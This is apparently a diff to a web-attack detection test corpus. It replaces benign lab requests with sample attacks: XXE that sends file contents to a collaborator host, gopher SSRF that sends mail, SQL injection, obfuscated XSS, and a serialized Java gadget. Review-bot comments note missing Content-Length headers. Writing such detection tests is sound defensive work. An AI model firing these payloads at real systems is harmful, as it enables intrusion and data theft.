 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/78/49/98be38d971427a7438abfc4b8b39.black b/testcases/78/49/98be38d971427a7438abfc4b8b39.black
index 9a7542ab2..2faaf40e0 100644
--- a/testcases/78/49/98be38d971427a7438abfc4b8b39.black
+++ b/testcases/78/49/98be38d971427a7438abfc4b8b39.black
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=toString%28%29.constructor.prototype.charAt%3D%5B%5D.join%3B+%5B1%2C2%5D%7CorderBy%3AtoString%28%29.constructor.fromCharCode%28120%2C61%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black b/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black index d1fa30373..15dc0703e 100644 --- a/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black +++ b/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black 
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?url=ldap://evil.com:11211/%0astats%0aquit HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B+%3C%21ENTITY+xxe+SYSTEM+%22http%3A%2F%2Finternal.vulnerable-website.com%2F%22%3E+%5D%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/7f/dc/98932ac8e0bef7a96be562836089.black b/testcases/7f/dc/98932ac8e0bef7a96be562836089.black
index 94e6fa9bb..7c863d42f 100644
--- a/testcases/7f/dc/98932ac8e0bef7a96be562836089.black
+++ b/testcases/7f/dc/98932ac8e0bef7a96be562836089.black
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /vulnerabilities/xss_r/?name=%3C%21ENTITY+%25+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%25+eval+%22%3C%21ENTITY+%26%23x25%3B+exfil+SYSTEM+%27http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%2F%3Fx%3D%25file%3B%27%3E%22%3E+%25eval%3B+%25exfil%3B HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21ENTITY+%25+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%25+eval+%22%3C%21ENTITY+%26%23x25%3B+exfil+SYSTEM+%27http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%2F%3Fx%3D%25file%3B%27%3E%22%3E+%25eval%3B+%25exfil%3B Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black b/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black index 09878daa3..8a308eaa8 100644 --- a/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black +++ b/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black 
@@ -1,10 +1,9 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit HTTP/1.1
 Host: 10.10.3.128:2280
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black b/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black
index 7aea0f17a..602bd4e48 100644
--- a/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black
+++ b/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /vulnerabilities/xss_r/?name=top%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black b/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black
index 0bc4cf90d..b4795b04c 100644
--- a/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black +++ b/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black @@ -1,11 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?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 HTTP/1.1 Host: 10.10.3.128:2280 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Ca+href%3D%23+download%3D%22filename.html%22%3ETest%3C%2Fa%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black b/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black index 007f7623c..b4f1703d0 100644 --- a/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black +++ b/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black 
@@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 +GET /?%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0073%5Cu0065%5Cu006c%5Cu0065%5Cu0063%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0065%5Cu0078%5Cu0074%5Cu0072%5Cu0061%5Cu0063%5Cu0074%5Cu0076%5Cu0061%5Cu006c%5Cu0075%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0078%5Cu006d%5Cu006c%5Cu0074%5Cu0079%5Cu0070%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0046%5Cu0078%5Cu006d%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0065%5Cu0072%5Cu0073%5Cu0069%5Cu006f%5Cu006e%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0031%5Cu002e%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0065%5Cu006e%5Cu0063%5Cu006f%5Cu0064%5Cu0069%5Cu006e%5Cu0067%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0055%5Cu0054%5Cu0046%5Cu002d%5Cu0038%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0046%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0031%5Cu0044%5Cu004f%5Cu0043%5Cu0054%5Cu0059%5Cu0050%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0072%5Cu006f%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0035%5Cu0042%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0031%5Cu0045%5Cu004e%5Cu0054%5Cu0049%5Cu0054%5Cu0059%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0035%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0061%5Cu0070%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0053%5Cu0059%5Cu0053%5Cu0054%5Cu0045%5Cu004d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%
5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0073%5Cu0065%5Cu006c%5Cu0065%5Cu0063%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0065%5Cu0072%5Cu0073%5Cu0069%5Cu006f%5Cu006e%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0034%5Cu0069%5Cu006e%5Cu0073%5Cu0074%5Cu0061%5Cu006e%5Cu0063%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0042%5Cu0075%5Cu0072%5Cu0070%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0046%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0035%5Cu0076%5Cu0061%5Cu0070%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0042%5Cu0025%5Cu0032%5Cu0035%5Cu0035%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0046%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0064%5Cu0075%5Cu0061%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 
diff --git a/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black b/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black index 40f80a15f..0f246bb3e 100644 --- a/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black +++ b/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /uc/feedback/api/v1/pc/feedback/add HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 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 + diff --git a/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black b/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black index ce4537f24..48a5b8fb1 100644 --- a/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black +++ b/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black 
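Review bot: The request in `testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black` is switched to `POST` and gains content after the header block, but the hunk adds no `Content-Length` (or `Transfer-Encoding`) and no `Content-Type` header. Under HTTP/1.1 framing a request without either length indicator has no body, so a server or WAF replaying this file verbatim may never inspect the payload, and the case would then pass or fail for the wrong reason. The replay harness may fill the length in itself, but the diff does not show that. The POST cases in `testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black`, `testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black` and `testcases/c0/89/6cbe70f48c5fd7492607415e1918.black` have the same gap. I would add `Content-Length: <body length in bytes>` to each, and `Content-Type: application/x-www-form-urlencoded` where the body is form-style, as in `Language_S=...`.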
@@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +Cookie: WBC-de5fbb=PFNDUklQVCBTUkM9Ly9CUlVURUxPR0lDLkNPTS5CUi8xPjwvU0NSSVBUPg== diff --git a/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black b/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black index b6932b32f..052fae91f 100644 --- a/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black +++ b/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black 
@@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: WBC-6bf79b=JTI3JTIyJTNFJTNDc3ZnJTJGb25sb2FkJTNEYWxlcnQlMjglMjklM0UlN0IlN0I3JTJBNyU3RCU3RA== Connection: close diff --git a/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black b/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black index c5177c16a..d43068484 100644 --- a/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black +++ b/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black @@ -1,10 +1,9 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /%3CSCRIPT%20SRC=/BRUTELOGIC.COM.BR/1%3E%3C/SCRIPT%3E HTTP/1.1 Host: 10.10.3.128:2280 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=1&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black b/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black index 0174b0e36..67b8e613b 100644 --- a/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black +++ b/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black 
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116(1)%3E HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black b/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black
index a01bd3810..e2cb049f8 100644
--- a/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black
+++ b/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /%3Csvg%20onload=alert(1)/ HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black b/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black
index 4e1d08126..8b09ea859 100644
--- a/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black
+++ b/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black
@@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: WBC-3fdce2=bmFtZVswKztzZWxlY3Qrc2xlZXAoOCk7OyMrK109dXNlciZwYXNzPXBhc3M= Connection: close diff --git a/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black b/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black index 12de587af..466f1c410 100644 --- a/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black +++ b/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black 
@@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +%2528select%2520extractvalue%2528xmltype%2528%2527%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253C%2521DOCTYPE%2520root%2520%255B%2520%253C%2521ENTITY%2520%2525%2520vapot%2520SYSTEM%2520%2522%2527%257C%257C%2528select%2520version%2520from%2520v%2524instance%2529%257C%257C%2527Burp%252F%2522%253E%2525vapot%253B%255D%253E%2527%2529%252C%2527%252Fl%2527%2529%2520from%2520dual%2529 + diff --git a/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black b/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black index 189ae2046..18832edb4 100644 --- a/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black +++ b/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black 
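Review bot: The new `POST /` sample in testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black carries a body but no `Content-Length` or `Content-Type` header, so under HTTP/1.1 framing it has no body. A proxy or parser in the replay path may discard the payload before the detection engine sees it, and the verdict would then reflect the headers only. I would add `Content-Type: application/x-www-form-urlencoded` and `Content-Length: <byte length of the body>` ahead of `Connection: close`. The other POST samples in this commit whose full header set is visible (9d/fb, c0/89, c2/14, c9/59, ce/8e, df/ee, eb/ce, f5/c3, fd/1d) show the same gap and need the matching JSON or XML content type.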
@@ -1,12 +1,13 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST / HTTP/1.1 Host: 10.10.3.128:2280 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +RCE + + + + + +RCE + +rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== + + + + + + + + diff --git a/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black b/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black index 819872bb5..7eeee43a8 100644 --- a/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black +++ 